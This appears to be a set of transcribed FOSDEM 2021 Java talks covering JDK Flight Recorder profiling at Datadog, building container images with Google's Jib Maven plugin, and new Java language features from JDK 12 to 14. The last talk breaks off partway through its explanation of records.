But it doesn't take each and every one of them: you can specify the average amount of memory allocated between the samples that you get. So that's a really nice thing to do, but eventually you probably want the samples emitted at a constant rate. So again we used inspiration from PID controllers to control the data production rate. That gives us some really nice qualities. We have a controllable data budget for our samples, they get spread out nicely over time, and we get actual individual samples with what kind of thing we tried to allocate, the size of the thing we were trying to allocate, and the time and thread it was allocated in. But we also have the amount of data allocated since the last sample, so we can still use that information for weighting, for getting the total allocation pressure and a nice view of that. And as I said before, if you can provide context — and since we're still getting hundreds of events per second even with this approach — we can break things down, even allocation rates, per, let's say, distributed trace. In this case we're actually not breaking it down per trace, because if you do get a garbage collection and you're spending a lot of garbage collection time in your actual span in your distributed trace, you probably want to know where that garbage was created, no matter which thread created it. So here we actually don't break it down. So this is a really stupid example. Anyway, let's go over to CPU profiling. So, CPU profiling: we have the execution sample events, and they are really nice in the sense that they are extremely cheap, both in memory and overhead. We have a pretty much constant overhead: we don't sample each thread, we sample a few of them every time, a constant amount. And they are not safepoint-biased, so we don't require a safepoint every time we try to take a sample, like you would need to if you used the Java APIs that are available for getting thread stack dumps. So that's all very good. There are a few cons though. One of them is that we're not sampling every single thread: for example, JVM native threads and native library threads will not be sampled, so you won't get a perfect mapping to the CPU time, and even though we might be able to compensate for some of that unaccounted CPU time using other events, it's not perfect. And we don't get native stacks. So we think the JVM would do quite well with a proper CPU profiler that takes a sample when a certain amount of CPU time has elapsed, no matter which thread. There are some really nice APIs today, for example perf_event_open on Linux, that are backed by the PMU — so by hardware, if you're not running in a container; not sure how often that would happen, realistically speaking, today. But we think it would be extremely useful to have something like that in JFR. So, as was shown in the demo, JFR has events for thread halts of various kinds, and you get some contextual information as well. You don't just get the stack trace: you get the stack trace, you get wall-clock timing; for monitor enter you get the monitor class and the monitor address, so you can see if there's more than one instance there; and for socket reads you get the amount read, the number of bytes read, and the IP address you read from. So these are obviously very useful pieces of information to have when you're trying to track down a problem. But of course, these events can happen too often, and JFR has one way to limit this output, to limit how many events are emitted.
And the only way you can do that in JFR today is with a threshold. Now, with JDK 16 and the rate limiter we added there, you could actually use that for more events, so hopefully we'll have that in the future. But this thresholding is problematic, because you will always run into edge cases. For example, if you have an application with 10,000 threads, and you have parks, and each park is like 11 milliseconds and your threshold is 10, that's probably an amount of events that you're not prepared to pay for — even if it's not necessarily a CPU overhead problem, it's definitely going to produce more data than you would want. And you also have a statistical skew: what if all your parks are at 9 milliseconds and your threshold is 10? You're not going to see them, so it's very hard to know if you actually missed something. So it would be nice if the Flight Recorder had a wall-clock profiler — it doesn't today — so you could get the best of both worlds: you could subsample and rate-limit the events, the PID thinking, and also have a proper wall-clock profiler for JFR. And you might even make it so that customers, and whoever would want to, could easily build their own dynamic wall-clock profiler using JFR. One way to do that would, for example, be to add a commit method on the event class that commits the event for a separate thread: it would use that thread and its stack trace, and maybe even allow it, with an extra annotation, to get the thread state and record that. That would be a nice addition to the API, and then everybody could sample things however they want — it could be a separate Java thread just picking threads and sampling them. Okay, so the last thing I thought I'd bring up is the old object sample event. For those of you who don't know, the old object sample event is a very interesting event for solving memory leaks without having to do full heap dumps. It samples instance allocations; you get the allocation stack trace, the allocation time and type, and you can also, when you dump the events, calculate the reference chains back to the objects. So you pretty much get everything on a silver platter that you might need for solving a memory leak. There are some problems though, because the allocation stack traces will survive for much longer than just a chunk, so the constants need to be stored somewhere where they can be kept for longer. And the current problem is twofold: one is that the stack traces are always sampled, so whenever you might consider sampling an old object sample, you will capture the stack trace; and the second is that constants that aren't used anymore will never be cleared. So these can grow very quickly and grow very large, and they won't shrink. So you can't really use the old object sample events for continuous profiling until we've solved that problem. Luckily, there is a solution coming up: reference counting for these tables will probably be committed over the next month or two, and then we can start using the old object sample for continuous profiling as well. Awesome! Okay, so I wildly overestimated the amount of content that I would be able to cram into this presentation, so there will sadly be no nice demos of all the cool things we're doing at Datadog with this technology. But I'm going to provide some links to things, and to a blog post that I did about continuous profiling and diagnostics, so that you can go check it out — or you can just try out the product and see all the good stuff that we do.
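To make the "build your own wall-clock profiler on top of JFR" idea above a bit more concrete, here is a toy sketch: a sampling thread that periodically walks the other threads, grabs their stack traces with plain JDK APIs, and commits a custom JFR event. It also shows the limitation pointed out above — JFR attaches the committing thread's stack trace, not the target's, which is exactly why a commit-for-another-thread API would help; here the target's frames are squeezed into a string field instead. All names are made up for the example, and a real profiler would rate-limit adaptively rather than sleep a fixed interval.

import jdk.jfr.Category;
import jdk.jfr.Event;
import jdk.jfr.Label;
import jdk.jfr.Name;

import java.util.Arrays;
import java.util.Map;
import java.util.stream.Collectors;

public class ToyWallClockSampler {

    @Name("demo.WallClockSample")
    @Label("Wall Clock Sample")
    @Category("Demo")
    static class WallClockSample extends Event {
        @Label("Sampled thread") String threadName;
        @Label("Thread state") String state;
        @Label("Top frames") String topFrames;
    }

    public static void main(String[] args) throws InterruptedException {
        // Run with -XX:StartFlightRecording so the committed events actually end up in a recording.
        while (true) {
            for (Map.Entry<Thread, StackTraceElement[]> e : Thread.getAllStackTraces().entrySet()) {
                Thread t = e.getKey();
                if (t == Thread.currentThread() || e.getValue().length == 0) continue;
                WallClockSample sample = new WallClockSample();
                sample.threadName = t.getName();
                sample.state = t.getState().toString();
                // JFR attaches *this* thread's stack to the event, so carry the target's frames manually.
                sample.topFrames = Arrays.stream(e.getValue()).limit(5)
                        .map(StackTraceElement::toString)
                        .collect(Collectors.joining(" <- "));
                sample.commit();
            }
            Thread.sleep(20); // sampling interval
        }
    }
}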
So the first thing I thought I'd mention is that JMC 8 will be released — at least source-released — by the time this presentation is held. It's up to the downstream vendors to provide binary releases, and that might take a bit of time, but you can at least build it yourself — or, well, maybe it will be released with binary releases by then too, we'll see. Anyway, there is a tutorial that you can use to learn more about Flight Recorder and Mission Control. It's on GitHub, and feel free to fork it and do pull requests for things that you want to improve in that tutorial. There is also a nice JShell example for using JMC Core — the parser and the statistical tools — together with flight recordings and Flight Recorder events; that is also on GitHub. So here are some interesting links that might be useful. One is the GitHub repo for OpenJDK JMC — and if you want to go to the JDK, it's of course the OpenJDK JDK repo. My blog, where I sometimes write about things related to JFR, serviceability or Mission Control. And the last link is to my foojay.io blog post on continuous profiling. So I think I'm probably out of time now.
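As a small follow-up to the JDK 16 allocation profiler discussed earlier: the throttled jdk.ObjectAllocationSample event can be consumed in-process with the JFR streaming API. A sketch follows — the "throttle" setting name, the "150/s" value and the field names are written from memory, so double-check them against your JDK before relying on them:

import jdk.jfr.consumer.RecordingStream;

/** Streams throttled allocation samples from the running JVM (JDK 16+). */
public class AllocationSampleStream {
    public static void main(String[] args) {
        try (RecordingStream rs = new RecordingStream()) {
            rs.enable("jdk.ObjectAllocationSample").with("throttle", "150/s");
            rs.onEvent("jdk.ObjectAllocationSample", event ->
                    System.out.println(event.getClass("objectClass").getName()
                            + " +" + event.getLong("weight") + " bytes"));
            rs.start(); // blocks; use startAsync() to keep the current thread free
        }
    }
}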
The JDK Flight Recorder (JFR) was open sourced with JDK 11, and was subsequently back-ported to JDK 8u262. JFR allows for always-on production time profiling, with little overhead and with a rich set of data. This talk will discuss things to consider when using JFR to profile hundreds of thousands of JVMs in mission critical systems all over the world. We will discuss trade-offs, limits, work-arounds and insights we’ve learnt as we’ve developed the Java profiling capabilities at Datadog.
10.5446/52803 (DOI)
Hello everyone, welcome to FOSDEM 2021. My name is Asi Shawdri, and today I will be talking about how you can containerize your Spring Boot application, or Java application, with the help of Jib. This presentation is going to be a mix of very few slides, and then we will mostly be doing a demo. So let's get started then. This is the agenda that we are going to cover today. I will just pause here for a moment if you want to quickly go through it — I have very few slides, I just wanted to make it very hands-on and interactive and less boring. So this is typically what we are going to cover in this presentation. I will start with myself: I am a software engineer, I work for a financial services company, and I am currently located in Pune, India. I also write a blog about technology, mostly about the things I work on or have some working experience with, or things I try just out of curiosity — any cool or trending things in technology — and I share my experience with others. I am a Java fan, I like anything related to Java, any framework or tool, and I like DevOps and anything related to cloud. I am very active on social media platforms like Twitter, where I mostly follow people who are passionate about technology and mostly discuss technology and related stuff. I am a contributor to a few open source projects as well; this is my GitHub username — and I forgot to mention my Twitter handle, which I have also mentioned there. I write blogs on Hashnode, and I am also active on professional networking sites like LinkedIn. Okay, so enough about myself — what is Jib? Jib is, as I said earlier, what you can call a modern-day containerizer for Java developers. This tool is developed and maintained by Google, it's an open source project, it has got plenty of traction and stars on GitHub, and it is widely popular among the Java community. Containerizing your application with Jib is very easy, because Java developers typically use build tools like Maven and Gradle, and Jib easily fits into that ecosystem: you just have to add a simple plugin to your Maven or Gradle build tool, and with very minimum configuration you will be able to containerize your Java application very quickly. Jib basically stands for Java Image Builder, and the most important thing you need to know about Jib is that you don't need a Docker daemon — although it has support for that as well, if you want to containerize your image that way. The default behavior, and the reason people mostly like Jib, is that you don't have to maintain and write Dockerfiles or have a Docker CLI and then do docker build and docker push. So as a Java developer you don't have to spend hours or weeks just to learn a new technology like Docker. I am not against that technology, I am just saying Jib is a very quick and easy way to containerize your Java application. And I think we all should agree to the fact that not all Java developers are container experts, and I mean it would be
a very wrong expectation to set that Java developers should also know about containerization — even though it would be a good skill set to have. Personally, I prefer to learn anything related to new, exciting or cool technologies that are coming, but it is a personal choice whether you want to learn a new technology for your work or otherwise. Most people who only care about writing code don't want to learn an extra technology, because — what I'm trying to say is — there is a learning curve involved, and it takes a while to get the hang of something like Docker. Even though there are very basic commands, getting an overview of a technology takes time, and if you started your journey with Docker, or already use Docker, then you might have gone through the same pain: learning a new technology is a journey in itself. And when you use a technology or tool, the problems of that technology or tool also become your problem — your application's problem, wherever you are using it. So Docker is, again, the standard way of building images still today, but there are many alternatives coming, and Jib is one of those cool alternatives, which is specially targeted towards Java developers. So you don't have to deal with complexities such as Dockerfiles or Docker installation and all those things — Jib abstracts away all those complexities for you, and you can focus more on writing code or adding features to your product, etc. So now, coming back to our presentation: how can you containerize your application? As I said, it is very easy — as easy as adding a plugin to the pom.xml of your Maven build, or a plugin to your build.gradle file for your Gradle projects. This is how it typically goes in the Java world, right? If you need support for a third-party system or something, you have a plugin for that. So this is how Jib works: you add the plugin and then you specify some configuration-related things to get your application containerized, and these options are also very minimal to get a basic version of your application as a containerized image. And then, again, this is your typical Jib versus Docker build flow. I'm not trying to compare these two technologies — my point is that Jib is very straightforward, much less complex; it is very easy to containerize your application with Jib rather than going with Docker. Again, Docker is already widespread in many enterprises, Docker is everywhere, so you cannot escape from it — and again, I'm not against the technology — but I'm just trying to highlight how your typical builds with Jib and Docker will look. Your Jib build is straightforward: you have a project, you add the plugin, and you get your containerized image pushed to a registry of your choice. With the Docker build flow, you need to have a Docker CLI and a Docker daemon, then you need to create the JAR and you need to write a Dockerfile — you build your JAR, then the Dockerfile does its work: you provide the instructions to create the image for your application in there, and then you
will do the typical Docker commands like docker build and docker push, and then you push it to a container registry. So, containerizing an application with Jib is very easy — and now we will do a quick demo. I will head over to my browser. For this demo I have already downloaded a basic version of the project; I used Spring Initializr, which is, I think, the option most Java developers use just to get up and running with a Spring Boot application — it is the preferred option. My application is a simple Spring Boot application which exposes a simple hello endpoint and prints a very basic hello message. So I will head over to my IDE now just to give an overview of the application. This is my Spring Boot project, and the thing to highlight here is that I don't have any Dockerfile in here — it is a very minimal setup, there is no Dockerfile involved. And now I will head over to the main part: I have already added the jib-maven-plugin — I am just highlighting it — and I have specified the version as well, which version to be used. These are some of the options that I have already added, but I think I should remove them because we will add them later, and then I have specified a very basic configuration. So I will try to explain what's going on here in the configuration section. This is how you configure containerizing your application: you specify the "from" base image — "from" is which base image you will be using, your application will be built on top of that — and then the "to" part is the details of your container registry, where the Jib plugin will push the final image to. Here I am using a distroless Java 11 image, and I have already added this image digest part so that it uses a specific image version; otherwise it will try to connect to the remote registry and figure out which image digest to use. So I specify which image digest to use over here. This is very basic. Again, one thing to mention here is that you don't need to specify the "from" part, I mean the base image — Jib by default uses Java 8 distroless images — but since I have set up for Java 11, and I wanted to give an overview that you have the option to choose a base image of your choice, I have used this option. Even if you don't provide this option, by default it takes Java 8 — Java 8 is still the standard; we are going to be moving to Java 16 and 17, but for most of the tools and frameworks it is still the default version. So again, that is another thing. Coming back to my Spring Boot application: my application is very basic, I have a simple REST controller and one simple hello endpoint, and there is a very basic "hello from Jib" message when this endpoint gets invoked. And now I will just head over to my IDE and try to create a containerized image of our application. So let me just run it — this is how you containerize your application with Jib; again, this option is specific to Maven, for Gradle it will be a different option, but the end goal is the same — so jib:build, and this should containerize our application. And so I am just
going to start the build now and wait for it to complete and meanwhile I will try to highlight the parts you know what is it trying to do and all those things okay so this part I need to highlight is the it is using the credentials so the plugin makes to authenticate with my container registry so this credentials are basically picked up from the main one settings file so I will head back to my browser just to explain this part meanwhile our build is still going on so the one thing that I think I forgot to mention is that when you containerize your application you need to provide this although this is not a secure way but this is just a demo so you need to in your setting.xml file you need to specify your registry URL and then username password that you are going to use for your you know repository and so this needs to be provided before you know you start building your application or run the build so I will now head back to my ID and so our build is still going on and another thing so we you know we could see some warning so it's 83% completed so initially it will take time because you know it tries to get the base image and all but subsequent builds are much faster so it takes around you know one minute 40 seconds and then second and so the build is completed and you see in since you can see the nice message over here that build and it is pushed the image to my you know Docker up container registry and so now I will go back to my browser and you know check the whether the image was pushed or not so I have already these many repository containers images available and the image name that we have used for our springboard application is we have mentioned in the palm dot XML file as I am just trying to highlight that part what was the image name so we have specified this so this is our you know this is going to be our image name so let's you know refresh the browser and see if our image was pushed or not so I will do a quick refresh so as you can see that our image is available here it was updated a minute ago and so it is showing its operating system you know it's what is used in inside the image and all those things so what we have done so I mean just trying to some repeat what you have done so far we have you know we have containerized our springboard application we had added the main one plugin and we selected the base image then we pushed the image to the container registry and we also I have also explained the authentication part that needs to be added for plugin to allow the plugin to you know authenticate with the container registry so now we will try to you know run this application and see if you are getting the expected output or not so I will head over to my terminal so I think let me I think there is some problem with my view so give me just one minute I will try to you know so what we will do now we will try to add a plugin and sorry we will try to run the image now so so that we can see the expected output that we the I mean the simple springboard the hello message that we are expecting from our application so I will run a simple run command so this will pull our image first and then you know run it so before going with that I let me just show you if there are any images so I don't have any image is available in my local you know local registry so I wanted to show you because that the G plugin has directly posted to the container registry and it has nothing to do with your local registry or you know it is not cached anywhere so now we will do is Docker run and run our 
application so it is not it is not able to find the image and now locally so it is trying to pull it from the Docker registry so I already have my Docker setup up and working so now it is it has started extracting the image layers and so let's just wait for this extraction to get completed and then once this you know extraction is completed it will try to run our application so the download looks like it's completed and it has started our springboard application and we will wait for it to you know get started properly so our springboard application is started now what I will do so what we have so these are the port exposed to my local host I mean in the container inside the container also and in my local host also so we can do a simple card you know 8080 slash hello sorry okay so we have got the expected output now this was this is what we have written from our you know the that the message that we have written so now what we'll do now I will do a quick change I will just add a simple you know exclamatory marks and change the message a little bit and we will again build our application and push it so earlier if you could see there was one warning coming that main class is not specified so this plugin was complaining about that so that is not an issue we can add the you know main class over here so in the container in the container you can specify you know many things so it gives you many option to you know tweak things or make things work according to your use case so I am just adding the main class so that warning goes even though that warning is you know it's not going to be a breaking change for us but just wanted to add that warning so what was the package name okay so it is in the spring inside spring not spring boot so I have then okay so I have added the main class so that warning also should now go away so now you know I will sorry so now I will try to run the build again and we will run the same option that we have used earlier, jib column build so this time it should not take you know it should be done quickly since we have done changes in the our source code only one class we have changed so if you see one thing that I wanted to highlight over here is that if you see this part right so this is how your directory structure or you know image layering inside your container image will be so your layering is divided into three part your resources your properties file in your resources and then your compiled classes and then your library dependency required to run your application so I mean the important thing I am trying to you know highlight over here is that so if you do a change only in your class file that only that parts get pushed and the same thing is only going to be pulled because that it will not build the whole application you know again so it has a good it has a nice catching mechanism and so it which you know it makes it very fast so now again what we will do we will hand back to our terminal so now what I will do is you know I will run the application again so first I will stop this container and so now I will do a Docker pull so I just very lazy you know so I am just copying the command but okay so as I said and yet so only the rest of the layering there was no change done so it is saying already exist and only since this image was layer was changed affected only that part was pulled same is the thing when you build you push to a container you only push the chip part which was changed so that's what makes it you know very fast so now I will just simply you know run our 
application — I mean, we will run our Docker container again — and we will see whether we get the changed output or not. So our Spring Boot application has started; now we will do the curl again. Okay, good, we are getting the changed message now, and this is the expected behaviour. One more thing: if you want to visualize how the image layering is done, you can take the help of a tool called dive. Dive — sorry, I think I need to mention the image ID here — gives you a nice overview of the inside of your image, so you can see the actual content inside the image. It is a nice, handy tool, and it also tells you whether there is any space issue, whether you are wasting any space or not. As you can see, these layers are related to your base image, and the rest — the jib-maven-plugin layers — are related to the layering that Jib has done. On the right-hand side in green you can see all your dependencies, then you have your resources at the bottom right, and then your compiled classes; we have only two classes, so that's what it shows. Again, if you look at the image details section on the left-hand side, there is no potential wasted space, which is good. The total image size is around 200 MB for a simple Spring Boot application, but you have the option to use a different base image which you think will do the job for your application, with a size that matches your expectations. What the Jib plugin provides by default is a distroless image, which is slimmer than the base images we typically use — Linux distribution images like Alpine — because those include a shell or a package manager, which let you SSH into the container or install packages inside it. Jib's default images don't support that; you can use an image of your choice, but by default it gives you images which are more secure, because they don't ship a package manager or shell, so there is less attack surface and your application is much more secure that way, and these distroless images have very few known vulnerabilities. I actually wanted to cover more things, but I am running out of time, so I will just head back to the slides. Our demo is completed, and we can now do a quick Q&A; if there is any feedback or questions we can discuss them further. Again, thank you — thank you Foojay and the team for giving me this opportunity to put forward my thoughts on this topic. Thanks a lot to Foojay and the folks at Foojay, and thank you.
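For reference, here is a minimal sketch of the Maven setup demonstrated in this talk. The plugin coordinates and the `jib:build` goal are the standard ones for the jib-maven-plugin; the version, base image, registry path, and main class below are placeholders and should be adjusted to your own project.

```xml
<!-- Sketch only: registry name, version and mainClass are assumptions. -->
<plugin>
  <groupId>com.google.cloud.tools</groupId>
  <artifactId>jib-maven-plugin</artifactId>
  <version>2.7.1</version>
  <configuration>
    <from>
      <!-- Optional: Jib defaults to a distroless Java base image if omitted -->
      <image>gcr.io/distroless/java:11</image>
    </from>
    <to>
      <!-- Placeholder repository; registry credentials come from settings.xml -->
      <image>docker.io/your-user/jib-demo</image>
    </to>
    <container>
      <mainClass>com.example.demo.DemoApplication</mainClass>
    </container>
  </configuration>
</plugin>
<!-- Build and push without a local Docker daemon:
     mvn compile jib:build -->
```

As described in the demo, the plugin authenticates against the target registry using a matching `<server>` entry (id, username, password) in your Maven settings.xml.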
Jib is a Java containerizer from Google that lets Java developers build containers using build tools like Maven and Gradle. Containerizing Java applications is not a trivial task, and there is a learning curve involved, as you have to familiarize yourself with tool-specific commands. I can say from personal experience that not all Java developers are container experts. For example, you first need Docker installed, and then you have to maintain a Dockerfile. Over time the image size grows, and you start trying things like multi-stage builds to reduce it and to ship only the dependencies your application requires. A developer ideally should not have to worry about these things. With Jib you don't deal with such complexities: you just add a plugin to your build tool (Maven or Gradle) and you are good to go. It takes care of building your image and pushing it to the container registry.
10.5446/52804 (DOI)
Okay, well, welcome to this session, which is called Getting the Most from Modern Java. My name is Simon Ritter, and I am the deputy CTO of Azul Systems. Now the idea behind this presentation, as the title would really suggest, is how to understand the new things that have occurred in Java in terms of features. Because we only got 30 minutes for this session, I need to kind of restrict this a little bit. So what I've decided to do is to go through the new language features that have occurred since JDK 11. So JDK 11 was the last long-term support release, and obviously we've had a number of releases since then because we have JDK 15 currently and literally this month because we're now in February, we'll have JDK 16 being released as well. So we've had several releases since then and a number of new language features. So what I've decided to do is just focus purely on the language features. There are lots of other things that have gone into Java. There's a number of API changes, a few changes at the JVM level, but really from the Java language perspective, what we're going to talk about or all the great things which we've seen introduced in the last, well, nearly about two and a half years, isn't it? Yes. Okay, so let's start with JDK 12, very logically, because that was the next release after JDK 11. Now, one of the things that was introduced here was the idea of switch expressions, and this was quite significant, not just from the point of view of what it provided in the language, but this is the first what's called preview feature in OpenJDK. And the idea behind a preview feature is to enable a new feature to be added to Java, but not making it part of the standard straightaway. The reason for that is that by doing it that way, people can have a chance to experiment with a feature, they can try it out, they can keep the tires on it, and then if they think that there's something that does need to be changed and they're not quite happy with it, feedback can be provided, and then the developers can review that and decide if they want to make some changes. And as we'll see, that seems to be working very well. So preview feature, it's kind of like the incubator modules that were introduced a while ago for new API features, and again, so you could introduce things without making it part of the standard. So switch expression, first preview feature. The reason behind this was if you look at the switch statement, which we've had right from the very beginning in Java, there's a number of things which make the use of a switch statement a little bit more tricky and potentially error prone than would be really ideal. And so the syntax of the switch statement was inherited from the C language, because a lot of Java syntax is based on the C language. And that was great for C, because the way that the switch statement worked in C was designed around the idea of a language which is more of a systems programming language, operating systems, compilers, those sort of types of things. Because Java is much more of an application language, the way that the switch statement works isn't quite the, you know, it leads to some potential problems. So one of the things that we have is that every case statement needs to be separated. So you've got to have case A, case B, case C. Okay, well, it's not that big of an overhead, but it's just a little bit more clunky than we really want. Then the other thing is we've got to remember to put a break statement in each of our case blocks. 
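As a sketch of the pitfall being described here — using java.time.DayOfWeek purely for illustration — note how a single missing break silently changes the result:

```java
import java.time.DayOfWeek;

class SwitchPitfall {
    // Classic switch statement: verbose, and a single missing 'break'
    // changes the result (TUESDAY falls through and ends up returning 8).
    static int numberOfLetters(DayOfWeek day) {
        int numLetters;
        switch (day) {
            case MONDAY:
            case FRIDAY:
            case SUNDAY:
                numLetters = 6;
                break;
            case TUESDAY:
                numLetters = 7;
                // oops - forgot 'break' here, execution falls through!
            case THURSDAY:
            case SATURDAY:
                numLetters = 8;
                break;
            default:
                throw new IllegalStateException("Unexpected day: " + day);
        }
        return numLetters;
    }
}
```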
And that one is a bit of a big one, because I know I've done this in the past. I'm sure most people have done it, who've used switch is you've forgotten somewhere to put a break in. And then because the syntax means that you can do that, what happens is that you will fall through into the next one. And then you do something you don't expect. And the application doesn't work the way you expect, which means you've got a bug. And then trying to find that can be quite difficult, because it's a little bit of a subtle one. So that's one of the problems. And then also the scope of local variables is not always intuitive when you use them within a case statement. So this was the rationale behind this. They wanted to improve this. And so if we look at how we typically use a switch statement, this is a very typical kind of example. What we're doing here is we're taking one variable, day, we're going to switch on that. And then we want to assign a value to another variable, number of letters, based on which day it is. It's a sort of like multiple if then else type of thing. And obviously that works very well, but we have a lot of code here. So we look at this, it's very verbose. We've got case Monday, case Friday, case Sunday. Then we have to assign number of letters equals six. And in the next block, we've got case Tuesday, number of letters equals seven. So again, there's a little bit of a problem here, because what we can see is that if we forget to assign number of letters, we again get a subtle bug that would be introduced and it's more difficult. So the idea behind switch expression is to simplify this a lot and make it much more robust in terms of eliminating potential errors. If we look at what we get in terms of the new syntax, straight away you can see that it's much more condensed. There's a lot less text that we need. And so what we can see here is the first thing, because it's now a switch expression, we can assign the return value to our variable number of letters. And we only need to do that once. So we eliminate that potential of error by saying take the result of the switch expression, assign it to number of letters and then do that once and that's it. Forget about it. Then we see that in terms of the case statements themselves, the engineers have obviously looked around and they've discovered this incredibly powerful feature, which is called a comma separated list. So now we don't have to have a separate case Monday, case Friday, case Sunday. We can have case Monday, comma Friday, comma Sunday. That on its own was well worth the effort to me. And what they've then done is to borrow some of the syntax from lambda expressions and use the arrow to indicate that the right hand side of the expression is the cases that we're interested in a match against. And then the right hand side is the value that we're going to return from the switch expression. And clearly there may be situations where the value is invalid, in which case we can also with the default there, you can see that we can throw a new illegal state exception. So we can still throw an exception if we need to either return a value or throw an exception. But again, nice and syntax, nice syntax, very condensed, much easier to see what's going on, much less error prone because again, we don't have those break statements. There's no chance of falling through. We always see what returning all good. 
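Here is a small reconstruction of the switch expression form just described (a sketch of the slide code, not a verbatim copy): comma-separated labels, arrow syntax, no fall-through, and the result assigned exactly once.

```java
import java.time.DayOfWeek;

class SwitchExpressionExample {
    // JDK 12 preview feature (standardized later): the switch is an
    // expression, so its value is returned directly.
    static int numberOfLetters(DayOfWeek day) {
        return switch (day) {
            case MONDAY, FRIDAY, SUNDAY -> 6;
            case TUESDAY                -> 7;
            case THURSDAY, SATURDAY     -> 8;
            case WEDNESDAY              -> 9;
            default -> throw new IllegalStateException("Invalid day: " + day);
        };
    }
}
```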
Now what we can do, and I'm not sure I really recommend this is you can actually combine the old style switch statement syntax with the new style switch expression. So you could do something like this, we use switch day, case Monday, case Friday, case Sunday, and then we use break to indicate the value that's going to be returned. And so we have break six, break seven, break eight and so on. And okay, you know, I don't really like this syntax that much because again, it sort of introduces the possibility of less readability and potentially some little bit more error prone perhaps. The other thing with switch expression is going back to the idea of local variables. And what you couldn't do in the past with the switch statement was to reuse a variable within different cases. And so the scoping of those variables didn't work. Now with the switch expression, as we can see here, you can actually form more complex code and you can use a block of code with the braces and say var x equals compute from and then in case two, you can do var x equals negative compute from. And that will work now and you can reuse the variable x in both of those cases and there's no issue over the scoping of those and not being valid. So that's all good. Again, I wouldn't recommend this syntax because once we start getting into code blocks, what I would recommend is to extract that code out, put it into a separate method and then call the method from that case. But there you go. You can do it. Okay, so that was the big things in JDK 12. Now let's move on to JDK 13. Now the six months of development, what did we get there? Well really only one sort of change in terms of the language. And this was what we called text blocks. Again, this is a preview feature. So introduced without being part of the standard so people can provide feedback. Now the problem we've had in the past with Java is that we can clearly define strings. But how we define strings is not always as easy as we really want it to be, especially if you want to have multi-line strings. That's the kind of big bugbear that people have. And in the example here, obviously what we want to do is have some sort of HTML tags and lay it out with indentation and new lines and so on. If we wanted to do that in Java before, it would be very complicated. We'd have to concatenate things. We'd have to put escape characters in there, backslash n, backslash r, those types of things. And it just becomes more hard work. What we needed was the ability to define a string where we didn't need lots of escape characters. We could simply say, okay, here's the start of the string. Everything after that is the string I'm interested in, including new lines, including any escape characters, whatever, and then have something that terminates that string in a way that compiler can understand. And that's what a text block is. So now rather than using a single set of double quotes, we use three double quotes together. So you can see here we've got string web page equals three double quotes. And one of the important things about this is that you can't start the string directly after those three double quotes. So you have to start the string on the next line. And here we've obviously got some HTML tags indented nicely, all very good. And then we terminate it with another three double quotes. Now if you wanted to put three double quotes in your string, then obviously that's a situation where you do have to escape it. 
So then you'd have to use a backslash in front of at least the first of those three double quotes. You can use one, two, or three backslashes. Realistically, you're only going to use one, but you could use one, two, or three. The syntax will support that. Now if we look at the output from this, what we'll see is maybe not particularly what you might expect. So what we see here is we run the web page and we see the HTML tags indented the way that we want them to, because we're using two spaces here. We never use tabs. We use two spaces. But what we're doing is allowing the layout of our strings to be the way that we would like it to be from the point of view of readability. What we don't have to do is push it all over to the left-hand side so that we got it aligned with the left-hand margin. That would be a little bit difficult in terms of readability. What we really want to do is what we've got here, where we can line up the string underneath the start of that so it's clear what's going on and it follows the layout of the rest of the application code. So the way that works is through what's called incidental whitespace. And in the case of this example here, what's happening is any whitespace up until the start of the first character of the text on the left-hand side is treated as incidental whitespace and eliminated. And that way, what happens is that you can see the HTML and the closing HTML tag are left justified against the margin. And then we still get the right indentation in terms of two characters and then four spaces, sorry, two spaces and then four spaces to get the right indentation. So we're eliminating that incidental whitespace. Now what you can do is if you want to shift things over and add more whitespace in front of it, you can actually shift your tags over and make it slightly further over to the left. And that will all right to the right and that will introduce more whitespace. So different ways of doing that. Switch expression. Ah, hang on. I just talked about switch expression. That was in JDK 12. So why am I talking about switch expression in JDK 13 again? And the answer is that there was feedback on this particular feature and the developer said, that's good feedback. We will make a change based on that. When I showed you the combination of the switch statement syntax along with the switch expression syntax, what we were doing there is we were saying case Monday, Friday, Sunday, break with a value of six. Now that will work because the break statement can be used on its own in a case statement or it can be used with a label. You can break out of a loop or a case statement to a label that's been defined elsewhere in the code. Bit like a go to. Must be I've never used that particular, well, maybe I have. No, I don't think I have. But anyway, I digress. So people said, well, yes, you can do it, but it's a bit confusing in terms of the syntax because you can never start a label with a number. So yes, the compiler knows that in this case it's returning a value. But it was still a little bit confusing to people and they said, don't really like that. So the developer said, okay, we'll make a change and rather than using break, we'll use yield. So now you do case Monday, case Friday, case Sunday, yield six, and that gives you the answer you want and all is good. So it's a feedback from developers and they've said, yeah, we'd like it to be a little bit different. And the developers said, okay, we'll take that feedback on board and make a change. JDK 14. 
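Before the talk moves on to JDK 14, here is a short sketch of the two things just covered: a text block, and the revised switch expression syntax where a block body uses yield rather than break. The HTML content and the string-based switch are illustrative only.

```java
class Jdk13Sketches {
    // Text block (preview in JDK 13): content starts on the line after the
    // opening triple quote; common leading whitespace is stripped as
    // "incidental" indentation.
    static final String WEB_PAGE = """
            <html>
              <body>
                <p>Hello, world</p>
              </body>
            </html>
            """;

    // Feedback-driven change: a block inside a switch expression produces
    // its value with 'yield' instead of 'break <value>'.
    static int numberOfLetters(String day) {
        return switch (day) {
            case "MONDAY", "FRIDAY", "SUNDAY" -> 6;
            case "TUESDAY" -> {
                yield 7;
            }
            default -> 8;
        };
    }
}
```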
Now JDK 14 introduced a couple of things. And I've got to say that probably in terms of the most recent releases, this is probably the big one with new features. So the first of those is around the way that we use simple data classes in Java. And if we look at the existing kind of code that we might write now, we would do something like this. So we're creating a class called point and effectively it's a two pool with two values X and Y. And in order to do that, we've obviously got to declare two instance variables, private final double X, double Y, then we have a constructor that takes two doubles. We then assign those doubles to the instance variables of the class. Then we've got access and methods so we can do public double X, which returns X, public double Y, which returns Y. And if you look at that, you've got, what is it? Something like 16 lines of code, maybe not with a white space, but probably good 12 lines of code just to create a two pool. And that's a lot of work when it's something as fundamental as this. So what JDK 14, I don't remember that JDK 14 introduces is the idea of records. This is, I like this. This is a really powerful thing and makes life a whole lot easier. So now what we can do is we can say, let's create a new class, but in this case, it's a record class and it's a new type of class within Java. There are some subtleties about this, which I'll go through in a moment. But essentially we're creating a class, which is a record and it's going to be called point. Now what we can do here is we can simply say point and then use the brackets to indicate the values that we want this record to encapsulate. So we've got double X and double Y. Then we simply have a set of empty braces and the compiler will generate all of the necessary code that is required for that two pool without us having to do any of it manually. So we get the same effective code as we had on the previous slide. So we get a constructor, we can pass values to it to, when we instantiate an object, we can access those variables through X and Y. Everything will work in exactly the same way. Now there are situations where not having a constructor may not be ideal because we might want to do some additional checking inside the constructor. In that 